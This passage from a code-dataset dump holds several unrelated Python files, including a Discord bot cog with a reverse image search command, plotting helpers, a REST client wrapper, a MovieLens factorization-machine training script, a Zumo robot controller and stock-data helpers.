re.compile('^\\s*(-?\\d+)\\s*,\\s*(-?\\d+)\\s*$').search(numero):\n m = re.compile('^\\s*(-?\\d+)\\s*,\\s*(-?\\d+)\\s*$').search(numero)\n n1 = int(m.group(1))\n n2 = int(m.group(2))\n \n if n1 <= n2:\n random_number = r.randint(n1, n2)\n else:\n random_number = r.randint(n2, n1)\n\n await ctx.reply(random_number)\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**Sintaxe incorreta! 
Use !random , **\"\n )\n \n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n\n # !junior - display junior's pic\n @commands.command(description=\"Junior zuado\")\n async def junior(self, ctx):\n embed = discord.Embed(\n color = discord.Color.gold(),\n timestamp = datetime.utcnow()\n )\n\n embed.set_image(url='https://image.prntscr.com/image/BemzF5RlTxa8Tdog35W5Aw.jpg')\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n message = await ctx.reply(embed=embed)\n await message.add_reaction('<:PepeWTF:720074659294478377>')\n\n\n # !now - now\n @commands.command(description=\"Display current datetime\")\n async def now(self, ctx):\n \"\"\" Auto detect timezone (working example 1) datetime.timezone \"\"\"\n # local_now = datetime.now(timezone.utc).astimezone()\n # await ctx.reply(local_now.strftime(\"%a, %b %d %Y %X %Z\"))\n \"\"\" Working example 2 (EST gmt -5) timezone.pytz \"\"\"\n # now_utc = datetime.now(timezone('UTC')).astimezone(timezone('EST'))\n # await ctx.reply(now_utc.strftime(\"%a, %b %d %Y %X %Z\"))\n\n # utc verification and stuff, you can change America/Sao_Paulo to another timezone See: https://gist.github.com/heyalexej/8bf688fd67d7199be4a1682b3eec7568\n local_now = datetime.now(timezone('UTC')).astimezone(timezone('America/Sao_Paulo'))\n if local_now.strftime(\"%Z\")[1] == '0':\n if len(local_now.strftime(\"%Z\")) != 3:\n utc = local_now.strftime(\"%Z\")[0] + local_now.strftime(\"%Z\")[2] + \":\" + local_now.strftime(\"%Z\")[3:]\n await ctx.reply(local_now.strftime(\"Today is %d/%m/%Y (%A), **%X (UTC{})**\").format(utc))\n else:\n utc = local_now.strftime(\"%Z\")[0] + local_now.strftime(\"%Z\")[2:]\n await ctx.reply(local_now.strftime(\"Today is %d/%m/%Y (%A), **%X (UTC{})**\").format(utc))\n elif local_now.strftime(\"%Z\").isalpha():\n await ctx.reply(local_now.strftime(\"Today is %d/%m/%Y (%A), **%X %Z**\"))\n elif local_now.strftime(\"%Z\")[1] != '0':\n if len(local_now.strftime(\"%Z\")) != 3:\n utc = local_now.strftime(\"%Z\")[:3] + \":\" + local_now.strftime(\"%Z\")[3:]\n await ctx.reply(local_now.strftime(\"Today is %d/%m/%Y (%A), **%X (UTC{})**\").format(utc))\n else:\n await ctx.reply(local_now.strftime(\"Today is %d/%m/%Y (%A), **%X (UTC%Z)**\"))\n\n \n # Method that is going to search for sauce\n async def search_sauce(self, ctx, url):\n # If url is from Twitter\n if re.compile('^https?:\\/\\/twitter\\.com\\/(?:#!\\/)?(\\w+)\\/status(es)?\\/(\\d+)').search(url):\n # Getting tweet id \n id = re.search('/status/(\\d+)', url).group(1)\n status = api.get_status(id, tweet_mode='extended')\n\n # If an image/video is included on the tweet\n if 'media' in status.entities:\n # Getting only first image\n url_twitter = status.extended_entities['media'][0]['media_url_https']\n\n # Results\n try:\n try:\n results = sauce.from_url(url_twitter)\n except:\n results = sauce2.from_url(url_twitter)\n except Exception as error:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**{}**\".format(error)\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n # return to stop 
the execution of the method\n return\n # No media\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**There is nothing to search for!**\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n # return to stop the execution of the method\n return\n # Other links\n else:\n # Trying to find the source\n # Results\n try:\n try:\n results = sauce.from_url(url)\n except:\n results = sauce2.from_url(url)\n # No media perhaps\n except UnknownClientError as error:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**There is nothing to search for!**\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n # return to stop the execution of the method\n return\n except Exception as error:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**{}**\".format(error)\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n # return to stop the execution of the method\n return\n\n # Getting the source with highest similarity\n best = results[0]\n\n # Embed\n embed = discord.Embed(\n color = discord.Color(0xffc338),\n timestamp = datetime.utcnow(),\n title = best.title\n )\n\n # Similarity\n embed.add_field(name=\"Similarity\".format(), value=\"{}%\".format(best.similarity), inline=True)\n\n # Author\n if best.author:\n embed.add_field(name=\"Author\".format(), value=\"{}\".format(best.author), inline=True)\n else:\n embed.add_field(name=\"Author\".format(), value=\"–\", inline=True)\n\n # Material\n if 'material' in best.raw['data']:\n if best.raw['data']['material']:\n embed.add_field(name=\"Material\", value=\"{}\".format(best.raw['data']['material']), inline=False)\n\n # Characters\n if 'characters' in best.raw['data']:\n if best.raw['data']['characters']:\n embed.add_field(name=\"Characters\", value=\"{}\".format(best.raw['data']['characters']), inline=False)\n\n # If source is from an anime\n if isinstance(best, VideoSauce):\n # Part/episode\n if 'part' in best.raw['data']:\n if best.raw['data']['part']:\n embed.add_field(name=\"Episode\", value=\"{}\".format(best.raw['data']['part']), inline=False)\n # Year\n if 'year' in best.raw['data']:\n if best.raw['data']['year']:\n embed.add_field(name=\"Year\", value=\"{}\".format(best.raw['data']['year']), inline=False)\n # Estimated time\n if 'est_time' in best.raw['data']:\n if best.raw['data']['est_time']:\n embed.add_field(name=\"Est Time\", value=\"{}\".format(best.raw['data']['est_time']), inline=False)\n # If source is from a book\n elif isinstance(best, BookSauce):\n # Part/volume\n if 'part' in best.raw['data']:\n if best.raw['data']['part']:\n embed.add_field(name=\"Part\", value=\"{}\".format(best.raw['data']['part']), inline=False) \n\n # Source\n if 'source' in best.raw['data']:\n if best.raw['data']['source']:\n # Pixiv link because https://i.pximg.net is 'broken'\n if re.compile('^https:\\/\\/i\\.pximg\\.net').search(best.raw['data']['source']):\n 
embed.add_field(name=\"Source\", value='https://www.pixiv.net/en/artworks/' + best.raw['data']['source'].split('/')[-1], inline=False)\n # Other links\n else:\n embed.add_field(name=\"Source\", value=best.raw['data']['source'], inline=False)\n\n # Links\n for count, link in enumerate(best.urls, start=1):\n embed.add_field(name=\"Link {}\".format(count), value=\"{}\".format(link), inline=False)\n\n # Thumbnail\n embed.set_thumbnail(url='{}'.format(best.thumbnail))\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n\n # !sauce (url) - search for sauce\n @commands.command(usage=\"(url)\", description=\"Search for sauce (You can also get the sauce by uploading an image or replying to a message)\")\n async def sauce(self, ctx, url = None):\n # If an URL is passed\n if url:\n await self.search_sauce(ctx, url)\n # No URL\n else:\n # If user wanna find out the source of an image from their pc\n if ctx.message.attachments:\n await self.search_sauce(ctx, ctx.message.attachments[0].url)\n # await ctx.reply(ctx.message.attachments[0].url)\n # If user wanna find out the source from a reply\n elif ctx.message.reference:\n # Original message\n message = await ctx.fetch_message(ctx.message.reference.message_id)\n\n # Image uploaded by an user\n if message.attachments:\n await self.search_sauce(ctx, message.attachments[0].url)\n # await ctx.reply(message.attachments[0].url)\n # Preview image from an URL\n elif message.embeds:\n # Embed with an image\n if message.embeds[0].image.url:\n await self.search_sauce(ctx, message.embeds[0].image.url)\n # await ctx.reply(message.embeds[0].image.url)\n # Embed with a thumbnail image\n elif message.embeds[0].thumbnail.url:\n await self.search_sauce(ctx, message.embeds[0].thumbnail.url)\n # await ctx.reply(message.embeds[0].thumbnail.url)\n # Embed with no image\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**Reply to a message that contains an image!**\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n # No image\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**Reply to a message that contains an image!**\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n # When user types only \"!sauce\"\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**There is nothing to search for!**\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n\n # Checking if arguments are valid\n @sauce.error\n async def sauce_error(self, ctx, error):\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**{}**\".format(error)\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado 
por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n\n # !junior - display junior's pic\n @commands.command(description=\"Junior zuado\")\n async def teste(self, ctx):\n embed = discord.Embed(\n color = discord.Color.gold(),\n timestamp = datetime.utcnow()\n )\n\n embed.set_image(url='https://gekinetu.com/wp-content/uploads/2021/07/img_1625613824-300x150.png')\n embed.set_thumbnail(url='https://static.wikia.nocookie.net/rezero/images/c/cc/Emilia_-_Re_Zero_Anime_BD_-_13.png/revision/latest/scale-to-width-down/1000?cb=20160915153714')\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n message = await ctx.reply(embed=embed)\n\n\ndef setup(client):\n client.add_cog(Outros(client))","repo_name":"leandro1st/discord-megumin-bot","sub_path":"cogs/outros.py","file_name":"outros.py","file_ext":"py","file_size_in_byte":18074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"15590005291","text":"'''\nMain admin window.\n@author: Nikita Ofitserov\n'''\n\nfrom PyQt4 import QtGui\n\nfrom twisted.internet import reactor\n\nfrom consys.admin import login, hwview\nfrom consys.admin.main_ui import Ui_MainWindow\n\nclass MainWindow(QtGui.QMainWindow):\n\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.hwmodel = hwview.HardwareModel()\n hwview.connect_model(self.hwmodel)\n self.ui.terminalsView.setModel(self.hwmodel)\n\n def closeEvent(self, *args, **kwargs):\n reactor.stop()\n\ndef on_login():\n global _window\n _window = MainWindow()\n _window.show()\n\nlogin.successful.connect(on_login)\n","repo_name":"neerc-linux/ConSys","sub_path":"consys/admin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"3143254248","text":"import os\nimport matplotlib\nmatplotlib.use('Agg')\n\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport seaborn as sns\n\ndef clean_directory(directory: str):\n \"\"\"\n Removes files in the experiment dir\n :param directory: experiment dir\n \"\"\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n for the_file in os.listdir(directory):\n file_path = os.path.join(directory, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n return\n\n\ndef save_scatter_plot(name: str, experiment_path: str, array_x: list, array_y: list):\n\n lim = max(array_x + array_y)\n\n plt.title(name)\n plt.xlim(0, lim)\n plt.ylim(0, lim)\n plt.plot(array_x, array_y, 'ro', markersize=1)\n plt.grid(True)\n plt.gca().set_aspect('equal', adjustable='box')\n plt.savefig(experiment_path)\n plt.close(\"all\")\n plt.clf()\n return\n\n\ndef save_scatter_plot2(name: str, experiment_dir: str, array1_x: list, array1_y: list, array2_x: list, array2_y: list):\n plt.title(name)\n plt.plot(array1_x, array1_y, 'ro')\n plt.plot(array2_x, array2_y, 'go')\n plt.grid(True)\n plt.gca().set_aspect('equal')\n plt.savefig(experiment_dir + name + '.png')\n plt.close(\"all\")\n plt.clf()\n return\n\n\ndef save_hist(name: str, experiment_path: str, array: list):\n plt.title(name)\n plt.hist(array, 50, normed=False, facecolor='green')\n plt.grid(True)\n plt.savefig(experiment_path)\n plt.close(\"all\")\n plt.clf()\n 
return\n\n\ndef save_rmse_hist(name: str, experiment_path: str, array1: list, array2: list):\n all_errors = []\n for i in range(0, len(array1)):\n rmse = np.math.sqrt((array1[i] - array2[i]) ** 2)\n all_errors.append(rmse)\n plt.title(name)\n plt.ylim(0, 0.05)\n n, b, p = plt.hist(all_errors, 50, normed=True, facecolor='green')\n plt.grid(True)\n plt.savefig(experiment_path)\n plt.close(\"all\")\n plt.clf()\n return\n\n\ndef save_3d_plot_dep(name: str, path: str, points):\n xs = np.array(points[:, 0])\n ys = np.array(points[:, 1])\n zs = np.array(points[:, 2])\n plt.title(name)\n fig = plt.figure(figsize=(40, 40))\n ax = fig.gca(projection='3d')\n ax.plot(xs, ys, zs)\n plt.savefig(path)\n plt.close(\"all\")\n plt.clf()\n return\n\n\ndef save_obj(name: str, path: str, points):\n scale = 10\n file = open(path, 'w')\n for point in points:\n file.write('v {} {} {}'.format(point[0] * scale, point[1] * scale, point[2] * scale))\n file.write('\\n')\n file.write('cstype cardinal\\n')\n file.write('deg 3\\n')\n file.write('curv 0.000000 3.000000 ')\n for i in range(1, points.shape[0]):\n file.write('{} '.format(str(i)))\n file.write('\\n')\n file.write('parm u 0.000000 1.000000 2.000000 3.000000\\n')\n file.write('end\\n')\n file.close()\n return\n\n\ndef save_xyz(name: str, path: str, points):\n scale = 10\n file = open(path, 'w')\n file.write(str(points.shape[0]))\n file.write('\\n')\n file.write(name)\n file.write('\\n')\n for point in points:\n file.write('H {} {} {}'.format(point[0] * scale, point[1] * scale, point[2] * scale))\n file.write('\\n')\n file.close()\n return\n\n\ndef save_3d_plot(name: str, path: str, points):\n xs = np.array(points[:, 0])\n ys = np.array(points[:, 1])\n zs = np.array(points[:, 2])\n plt.title(name)\n fig = plt.figure(figsize=(40, 40))\n ax = fig.add_subplot(111, projection='3d')\n\n # Get rid of the panes\n ax.w_xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n ax.w_yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n ax.w_zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n\n # Get rid of the spines\n ax.w_xaxis.line.set_color((1.0, 1.0, 1.0, 0.0))\n ax.w_yaxis.line.set_color((1.0, 1.0, 1.0, 0.0))\n ax.w_zaxis.line.set_color((1.0, 1.0, 1.0, 0.0))\n\n # Get rid of the ticks\n # ax.set_xticks([])\n # ax.set_yticks([])\n # ax.set_zticks([])\n\n ax.xaxis.set_ticklabels([])\n ax.yaxis.set_ticklabels([])\n ax.zaxis.set_ticklabels([])\n\n ax.set_axis_bgcolor((1, 1, 1))\n\n line = ax.plot(xs, ys, zs)\n plt.setp(line, linewidth=8)\n\n plt.savefig(path)\n plt.close(\"all\")\n plt.clf()\n return\n\ndef save_adjastency_matrix(name: str, path: str, data):\n plt.title(name)\n fig = plt.figure(figsize=(80, 80))\n f, ax = plt.subplots(figsize=(11, 9))\n colors = [\"blue\", \"yellow\", \"red\"]\n cmap = sns.blend_palette(colors, as_cmap=True)\n sns.heatmap(data, cmap=cmap, square=True, xticklabels=100, yticklabels=100)\n plt.savefig(path)\n plt.close(\"all\")\n plt.clf()\n return\n","repo_name":"skkap/mdsga","sub_path":"src/helpers/files_helper.py","file_name":"files_helper.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"33167417738","text":"import json\nimport logging\nfrom enum import Enum\n\nimport requests\nfrom requests import Response\n\n\nclass HTTPMethods(Enum):\n GET = 'get'\n POST = 'post'\n PUT = 'put'\n DELETE = 'delete'\n PATCH = 'patch'\n HEAD = 'head'\n OPTIONS = 'options'\n\n\nclass Environnement(Enum):\n PROD = 'prod'\n DEV = 'dev'\n TEST = 'test'\n\n\nclass ClientApp:\n\n def 
__init__(self,\n                 client_id: str = '',\n                 client_secret: str = '',\n                 environnement: Environnement = Environnement.DEV,\n                 ):\n        self.client_id = str(client_id)\n        self.client_secret = str(client_secret)\n        if str(environnement).upper() in ['PRD', 'PROD', 'PRODUCTION']:\n            self.environnement = Environnement.PROD\n        elif str(environnement).upper() in ['DEV', 'HOM', 'UAT', 'DEVELOPMENT']:\n            self.environnement = Environnement.DEV\n        else:\n            self.environnement = str(environnement).upper()\n\n\nclass ServiceManager:\n\n    def __init__(self,\n                 client_app,\n                 api_name=\"\",\n                 logger_name=\"\",\n                 return_raw_response=False):\n        \"\"\"\n        :type client_app: ClientApp\n        :param client_app: your client app information\n        :param api_name: name of the API Service calling the service_manager: Used for Init logs purposes\n        :param logger_name: name of the logger to use for logs\n        :param return_raw_response: if True, returns the API response as is, else returns a Box object\n        \"\"\"\n\n        self.client_app = client_app\n        self.api_name = api_name\n        self.logger_name = logger_name\n        self.return_raw_response = return_raw_response\n        self.accepted_responses = list(range(200, 207))\n\n        self.session = requests.Session()\n        self.logger = self.get_logger()\n\n        if self.logger:\n            self.get_service_info()\n        else:\n            print(self.get_service_info())\n\n    def get_logger(self):\n        if self.logger_name:\n            return logging.getLogger(self.logger_name)\n        else:\n            for name in logging.root.manager.loggerDict:\n                if name.startswith(self.api_name):\n                    return logging.getLogger(name)\n        return None\n\n    def get_service_info(self):\n        if self.logger:\n            self.logger.info(f\"ServiceManager for {self.api_name} initialized\")\n        else:\n            return f\"ServiceManager for {self.api_name} initialized\"\n\n    def get(self, uri_request, params='', timeout=60, verify=True):\n\n        return self._test_response(\n            self.session.get(url=uri_request, params=params, timeout=timeout, verify=verify), request_params=params)\n\n    def post(self, uri_request, data='', json='', timeout=60, verify=True):\n        data = self._dump_data(data)\n        return self._test_response(\n            self.session.post(url=uri_request, data=data, json=json, timeout=timeout, verify=verify),\n            request_data=data,\n            request_json=json)\n\n    def patch(self, uri_request, data='', json='', timeout=60, verify=True):\n        data = self._dump_data(data)\n        return self._test_response(\n            self.session.patch(url=uri_request, data=data, json=json, timeout=timeout, verify=verify),\n            request_data=data,\n            request_json=json)\n\n    def put(self, uri_request, data='', json='', timeout=60, verify=True):\n        data = self._dump_data(data)\n        return self._test_response(\n            self.session.put(url=uri_request, data=data, json=json, timeout=timeout, verify=verify),\n            request_data=data,\n            request_json=json)\n\n    def delete(self, uri_request, timeout=60, verify=True):\n        return self._test_response(\n            self.session.delete(url=uri_request, timeout=timeout, verify=verify)\n        )\n\n    @staticmethod\n    def _dump_data(data):\n        if data:\n            return json.dumps(data)\n        return data\n\n    def _test_response(self, response: Response, request_params: str = '', request_data: str = '', request_json=''):\n        if not self.return_raw_response and response.status_code in self.accepted_responses:\n            try:\n                return response.json()\n            except Exception as e:\n                return print(f\"{response.text} - {e}\")\n\n        if self.logger:\n            log_string = f'Error on {response.request.method} method for this request: {response.request.url}\\n' \\\n                         f\"Status code: {response.status_code} - Reason: {response.reason} - Text: 
{response.text}\"\n\n            if request_params != '' and request_params is not None:\n                log_string += f\"\\nRequest params: {request_params}\"\n            if request_data != '' and request_data is not None:\n                log_string += f\"\\nRequest data: {request_data}\"\n            if request_json != '' and request_json is not None:\n                log_string += f\"\\nReturn json: {request_json}\"\n            self.logger.error(log_string, exc_info=False)\n\n        if response.status_code not in self.accepted_responses:\n            return response.raise_for_status()\n        return response\n","repo_name":"garciahyacinthe/Investment_Shared","sub_path":"api_manager/rest_service_manager.py","file_name":"rest_service_manager.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70204669768","text":"from copy import deepcopy\nimport random\n\ndef build_speaker_dict(scene, all_names, male_names, female_names):\n    scene_speakers = set()\n    # Collect Speaker Names\n    for line in scene:\n        if len(line)==13:\n            scene_speakers.add(line[8].lower())\n        elif len(line)>13:\n            scene_speakers.add(line[9].lower())\n        # all_speakers.add(\" \".join([token.lower() for token in line[9:len(line)-4]]))\n    # Build Speaker Dict\n    speaker_dict = {}\n    male_subset = deepcopy(all_names['male_names'][:100])\n    female_subset = deepcopy(all_names['female_names'][:100])\n    # print(male_subset)\n    # print(female_subset)\n    for speaker in scene_speakers:\n        if speaker in male_names:\n            mapped_name = random.sample(male_subset, 1)[0]\n            male_subset.remove(mapped_name)\n            speaker_dict[speaker] = mapped_name.capitalize()\n        elif speaker in female_names:\n            # print(\"Female:\", speaker)\n            mapped_name = random.sample(female_subset, 1)[0]\n            female_subset.remove(mapped_name)\n            speaker_dict[speaker] = mapped_name.capitalize()\n    return speaker_dict\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"boyuanzheng010/mmc","sub_path":"data_creation/prepare_exp_data/utils/convert_speaker_names.py","file_name":"convert_speaker_names.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"17063329149","text":"#coding: utf-8\n\nimport tushare as ts\n\ndef k_chart_data(code):\n    \"\"\"\n    Get K-line (candlestick) chart data for the given stock code\n    Args:\n        code: stock code\n    Returns:\n        [] list of closing prices\n    \"\"\"\n    _data = ts.get_hist_data(code)\n    r = _data.sort_index().close\n    return [\n        (x,r[x]) for x in r.index\n    ]\n\ndef info(code):\n    \"\"\"\n    Get basic information for the given stock code\n    Args:\n        code: stock code\n    Returns:\n        {}\n    \"\"\"\n    _data = ts.get_stock_basics()\n    _item = dict(_data.loc[code])\n    return _item\n\ndef border(code, day=None):\n    \"\"\"\n    Get the price range (minimum and maximum) for the given stock code\n    Args:\n        code: stock code\n    Returns:\n        () first element is the minimum, second element is the maximum\n    \"\"\"\n    _d = ts.get_hist_data(code)\n    _c = None\n    if day is not None:\n        _c = _d.close[-day:]\n    else:\n        _c = _d.close\n    return (round(_c.min(), 2), round(_c.max(), 2))\n","repo_name":"trainking/venus","sub_path":"data/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38665401138","text":"import pandas as pd\n\nimport os.path as path\nfrom subprocess import call\nfrom sklearn.metrics import mean_squared_error\n\ndata_dir = '/home/lz1008/Homework/GD/PyProject/data/ml-20m/'\n\n\ndef prepare_csv():\n    movie = pd.read_csv(path.join(data_dir, 'movie.csv'))\n    movie['movieId'] = movie['movieId'].astype(int)\n    genre_names = [\"Action\", \"Adventure\", \"Animation\", \"Children\", \"Comedy\", \"Crime\",
\n                   \"Documentary\", \"Drama\", \"Fantasy\", \"Film-Noir\", \"Horror\", \"Musical\",\n                   \"Mystery\", \"Romance\", \"Sci-Fi\", \"Thriller\", \"War\", \"Western\", \"IMAX\"]\n    genres_map = {}\n    for tp in movie.itertuples():\n        genres_map[tp[1]] = tp[3]\n\n    rating = pd.read_csv(path.join(data_dir, 'rating.csv'))\n    rating['movieId'] = rating['movieId'].astype(int)\n\n    output = open(path.join(data_dir, 'rating_g.csv'), 'w')\n    output.write(','.join([\"rating\", \"userId\", \"movieId\"] + genre_names) + '\\n')\n    for tp in rating.itertuples():\n        genres = genres_map[tp[2]].split('|')\n        onehot = [genre in genres and '1' or '' for genre in genre_names]\n        output.write('{},{},{},{}\\n'.format(tp[3], tp[1], tp[2], ','.join(onehot)))\n\n\ndef convert_csv():\n    call(['./cmake-build-release/src/utility/csv2ffm',\n          path.join(data_dir, 'rating_g.csv'),\n          path.join(data_dir, 'rating_g.ffm'),\n          '--header',\n          '--per-column',\n          '--encode', 'c2n19',\n          '--group', '1;2;3-21',\n          ])\n\n\ndef train():\n    cmd_args = ['./cmake-build-release/src/zlearn',\n                '--threads', '4',\n                '--regression',\n                'train', 'FM',\n                '--opt', 'sgd',\n                '--metric', 'rmsd',\n                '-n', '100',\n                '--window', '5',\n                '-k', '4',\n                '-r', '0.002',\n                '--lr', '0.00002',\n                '--input', path.join(data_dir, 'rating_g.ffm'),\n                '--split', '4:1',\n                '--dump-train', path.join(data_dir, 'train.ffm'),\n                '--dump-test', path.join(data_dir, 'test.ffm'),\n                ]\n    print(' '.join(cmd_args))\n    # call(cmd_args)\n\n\ndef predict():\n    cmd_args = ['./cmake-build-release/src/zlearn',\n                'predict',\n                '--model', path.join(data_dir, 'rating_g.ffm.bin'),\n                '--input', path.join(data_dir, 'test.ffm'),\n                '--output', path.join(data_dir, 'test.out'),\n                ]\n    call(cmd_args)\n\n\ndef measure():\n    predicted = open(path.join(data_dir, 'test.out'))\n    truth = open(path.join(data_dir, 'test.ffm'))\n    P = []\n    T = []\n    i = 0\n    while True:\n        p = predicted.readline()\n        t = truth.readline()\n        i += 1\n        if len(p) == 0:\n            break\n        assert len(t) != 0\n        t = t.split(' ')[0]\n        P.append(float(p[:-1]))\n        T.append(float(t))\n    print(mean_squared_error(T, P))\n\n\nif __name__ == '__main__':\n    # prepare_csv()\n    # convert_csv()\n    train()\n    # predict()\n    # measure()\n","repo_name":"billuo/zlearn","sub_path":"scripts/run_ml-20m.py","file_name":"run_ml-20m.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32189715724","text":"\"\"\" \nMain file \n\nTask:\n    Chase a colored object without colliding with other obstacles or\n    driving off the track.\n    Camera: looks for the given color\n    IR: watches the edges\n    Ultrasound: avoids collisions with other objects\n    Alternatively: defend its territory from statistics booklets\n\nBehaviors:\n    Idle: random speed, searches for a target\n    EdgeDetection: edge\n    Stop: button press or goal accomplished\n    (RemoteControl: remote control from the command line)\n\nSensobs:\n    EdgeFinder\n    ColorFinder\n\"\"\"\n\nfrom RPi import GPIO\nfrom project6_zumo.bbcon import BBCON\nfrom project6_zumo.arbitrator import Arbitrator\nfrom project6_zumo.motob import Motob\nfrom project6_zumo.behaviors import RemoteControl, EdgeDetection, Idle, Anti_crash, ColorChasing\nfrom project6_supply.sensors.zumo_button import ZumoButton\nfrom project6_supply.motors import Motors\nfrom project6_zumo.sensobs import Collition, ColorFinder\nimport wiringpi as wp\n\nimport sys\n\n\ndef main():\n    wp.wiringPiSetupGpio()\n    m = Motors()\n    m.forward(0.2, 0.2)\n\n    btn = ZumoButton()\n    btn.wait_for_press()\n    a = Arbitrator()\n    controller = BBCON(a)\n    
print(\"Created controller\")\n collition_detector = Collition()\n color_finder = ColorFinder()\n print(\"Created common sensobs\")\n # controller.add_behavior(RemoteControl(10))\n controller.add_behavior(EdgeDetection(100))\n controller.add_behavior(Anti_crash(10, sensors=[collition_detector]))\n controller.add_behavior(Idle(1))\n controller.add_behavior(ColorChasing(\n 15, sensors=[color_finder, collition_detector]))\n controller.activate_behavior(controller.behaviors[0])\n controller.activate_behavior(controller.behaviors[1])\n controller.activate_behavior(controller.behaviors[2])\n controller.activate_behavior(controller.behaviors[3])\n print(\"Added behaviors:\")\n for c in a.behaviors:\n print(c)\n controller.motobs = [Motob(None)]\n print(\"Added motob\")\n print(\"Running loop\")\n while 1:\n controller.run_one_timestep()\n\n\nif __name__ == \"__main__\":\n try:\n main()\n finally:\n GPIO.cleanup()\n","repo_name":"Riphiphip/Plab-Group-Behavior-Based-Robot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26577113927","text":"import math\nimport os\nimport gc\nimport json\nfrom tqdm import tqdm\n\nimport pandas as pd\nimport numpy as np\n\nimport torch\nimport torch.nn.functional as F\n\nimport pytorch_lightning as pl\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom utils import torch_nanmean, torch_nanstd, torch_nansum, torch_nanmax, torch_nanmin, transform_num_days\nfrom utils import impute, impute_with_medians, extend, from_date_to_int\n\nimport warnings\nfrom pandas.core.common import SettingWithCopyWarning\nwarnings.simplefilter(action=\"ignore\", category=SettingWithCopyWarning)\n\nnp.set_printoptions(threshold=2000, linewidth=140, precision=5, edgeitems=20, suppress=1)\npd.set_option('display.max_rows', 600)\n\n\n\nclass JPXdataModule(pl.LightningDataModule):\n\n def __init__(self, mode=None, 